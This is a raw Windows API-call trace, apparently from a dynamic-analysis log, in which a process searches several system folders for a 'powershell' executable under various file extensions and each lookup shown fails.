	[0452.329] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.329] SetErrorMode (uMode=0x1) returned 0x1
	[0452.329] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.330] SetErrorMode (uMode=0x1) returned 0x1
	[0452.330] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.330] SetErrorMode (uMode=0x1) returned 0x1
	[0452.330] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.330] SetErrorMode (uMode=0x1) returned 0x1
	[0452.330] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.330] SetErrorMode (uMode=0x1) returned 0x1
	[0452.331] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.331] SetErrorMode (uMode=0x1) returned 0x1
	[0452.331] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.331] SetErrorMode (uMode=0x1) returned 0x1
	[0452.331] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.331] SetErrorMode (uMode=0x1) returned 0x1
	[0452.331] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.332] SetErrorMode (uMode=0x1) returned 0x1
	[0452.332] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.332] SetErrorMode (uMode=0x1) returned 0x1
	[0452.332] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.332] SetErrorMode (uMode=0x1) returned 0x1
	[0452.332] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.332] SetErrorMode (uMode=0x1) returned 0x1
	[0452.332] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.333] SetErrorMode (uMode=0x1) returned 0x1
	[0452.333] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.333] SetErrorMode (uMode=0x1) returned 0x1
	[0452.333] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.333] SetErrorMode (uMode=0x1) returned 0x1
	[0452.333] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.334] SetErrorMode (uMode=0x1) returned 0x1
	[0452.334] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.334] SetErrorMode (uMode=0x1) returned 0x1
	[0452.334] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.334] SetErrorMode (uMode=0x1) returned 0x1
	[0452.335] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.335] SetErrorMode (uMode=0x1) returned 0x1
	[0452.335] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0452.335] SetErrorMode (uMode=0x1) returned 0x1
	[0452.335] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.336] SetErrorMode (uMode=0x1) returned 0x1
	[0452.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.336] SetErrorMode (uMode=0x1) returned 0x1
	[0452.336] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.336] SetErrorMode (uMode=0x1) returned 0x1
	[0452.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.336] SetErrorMode (uMode=0x1) returned 0x1
	[0452.337] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.337] SetErrorMode (uMode=0x1) returned 0x1
	[0452.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.337] SetErrorMode (uMode=0x1) returned 0x1
	[0452.337] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.337] SetErrorMode (uMode=0x1) returned 0x1
	[0452.337] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.338] SetErrorMode (uMode=0x1) returned 0x1
	[0452.338] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.338] SetErrorMode (uMode=0x1) returned 0x1
	[0452.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.338] SetErrorMode (uMode=0x1) returned 0x1
	[0452.338] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.338] SetErrorMode (uMode=0x1) returned 0x1
	[0452.338] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.339] SetErrorMode (uMode=0x1) returned 0x1
	[0452.339] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.339] SetErrorMode (uMode=0x1) returned 0x1
	[0452.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.339] SetErrorMode (uMode=0x1) returned 0x1
	[0452.339] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.339] SetErrorMode (uMode=0x1) returned 0x1
	[0452.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.340] SetErrorMode (uMode=0x1) returned 0x1
	[0452.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.340] SetErrorMode (uMode=0x1) returned 0x1
	[0452.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.340] SetErrorMode (uMode=0x1) returned 0x1
	[0452.340] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.340] SetErrorMode (uMode=0x1) returned 0x1
	[0452.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.341] SetErrorMode (uMode=0x1) returned 0x1
	[0452.341] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.341] SetErrorMode (uMode=0x1) returned 0x1
	[0452.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.341] SetErrorMode (uMode=0x1) returned 0x1
	[0452.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.602] SetErrorMode (uMode=0x1) returned 0x1
	[0452.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.602] SetErrorMode (uMode=0x1) returned 0x1
	[0452.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.602] SetErrorMode (uMode=0x1) returned 0x1
	[0452.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.602] SetErrorMode (uMode=0x1) returned 0x1
	[0452.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.603] SetErrorMode (uMode=0x1) returned 0x1
	[0452.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.603] SetErrorMode (uMode=0x1) returned 0x1
	[0452.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.603] SetErrorMode (uMode=0x1) returned 0x1
	[0452.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0452.604] SetErrorMode (uMode=0x1) returned 0x1
	[0452.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.604] SetErrorMode (uMode=0x1) returned 0x1
	[0452.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0452.604] SetErrorMode (uMode=0x1) returned 0x1
	[0452.604] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.604] SetErrorMode (uMode=0x1) returned 0x1
	[0452.604] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0452.605] SetErrorMode (uMode=0x1) returned 0x1
	[0452.605] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.605] SetErrorMode (uMode=0x1) returned 0x1
	[0452.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0452.605] SetErrorMode (uMode=0x1) returned 0x1
	[0452.605] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.605] SetErrorMode (uMode=0x1) returned 0x1
	[0452.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c8bd720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0452.606] SetErrorMode (uMode=0x1) returned 0x1
	[0452.606] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c8bd8c0 | out: lpFindFileData=0x1c8bd8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0452.606] SetErrorMode (uMode=0x1) returned 0x1
